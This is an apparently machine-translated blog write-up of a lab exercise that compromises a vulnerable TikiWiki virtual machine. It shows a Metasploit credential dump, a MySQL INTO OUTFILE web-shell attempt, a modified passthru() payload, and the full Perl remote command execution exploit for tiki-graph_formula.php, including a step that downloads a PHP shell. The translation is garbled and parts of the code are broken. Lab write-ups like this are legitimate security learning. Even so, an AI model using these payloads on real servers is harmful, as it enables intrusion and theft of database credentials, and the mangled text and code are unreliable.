tiki-graph_formula.php code execution vulnerability reproduction (maybe ??)

1. I do not know where to turn out of the virtual machine image (do not know when to appear in the disk inside)

Drone Mirror: https: //

Extraction code: 1y8f

Open the configuration about this thing is tikiwiki

2. meet new stuff can not help curiosity, open nikto scanned it and found some strange things

Would have no hope at all, really did not expect scanned, and there are a phpinfo.php, a phpMyAdmin, seems to be a vulnerability TikiWiki


Open msf, search it tikiwiki

Five payload, one by one test

use auxiliary/admin/tikiwiki/tikidblib               #载入这个poc

# Drone IP show options # to see if there is an error run # attack

Successful attack? (Ah, really successful, a bit simple overdone), where to get the database user name and password, including the database name


Password use of attack obtained, Gordon about to try, successfully landing

5.getshell && mysql wrote Ma

Because here it directly to the root account (Dba), and therefore can be directly entered, and write a sentence

SELECT '' INTO OUTFILE '/var/www/tikiwiki/cmd.php';

Tried, do not go to write, you can not create file error



I intend to write log backups, and found that, as shown below


wtf ?, Without this variable?

And then see if there is written permission

SHOW VARIABLES LIKE 'secure_file_priv';



Excerpt: https: //

Discovery, you can write, but NMD, Why?


5. anxious

phpMyAdmin3.0 (exploit / unix / webapp / phpmyadmin_config) vulnerabilities also tried, to no avail.

Turn to go behind the scan results nikto


Here clearly a code injection may be performed phpinfo ()

Baidu turned waited a long time, the problem lies in the tiki-graph_formula.php here, and she found a exp


Generally looked down



There seems to be using the passthru () command to be executed

Complete exp

Link address: https: //

# TikiWiki <= 1.9.8 Remote Command Execution Exploit
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. 
# The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input 
# supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP 
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR 
# $Id:,v 0.1 2007/10/12 13:25:08 str0ke Exp $

use strict;
use LWP::UserAgent;

my $target = shift || &usage();
my $proxy = shift;
my $command;

&exploit($target, "cat db/local.php", $proxy);

print "[?] php shell it?\n";
print "[*] wget -O backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";

	print "tiki\# ";
	chomp($command = );
	exit unless $command;
	&exploit($target, $command, $proxy);

sub usage()
	print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit\n";
	print "[?] str0ke \n";
	print "[?] usage: perl $0 [target]\n";
	print "    [target] (ex.\n";
	print "    [proxy] (ex.\n";

sub exploit()
	my($target, $command, $proxy) = @_;

	my $cmd = 'echo start_er;'.$command.';'.'echo end_er';
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

	my $conn = LWP::UserAgent->new() or die;
	$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
	$conn->proxy("http", "http://".$proxy."/") unless !$proxy;
	my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");

	if ($out->content =~ m/start_er(.*?)end_er/ms) {
		print $1 . "\n";
	} else { 
		print "[-] Exploit Failed\n";

# [2007-10-12]


Code execution vulnerability exists, then modify payload[]=x.tan.passthru('whoami').die()&t=png&title=



One problem is that there can only execute a single command, the input parameters of the order, personally think we should put the command into a bit stream (on exp is so roughly handled)

Finally, make up, this module I found msf above

Matching Modules

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution

Leave a Reply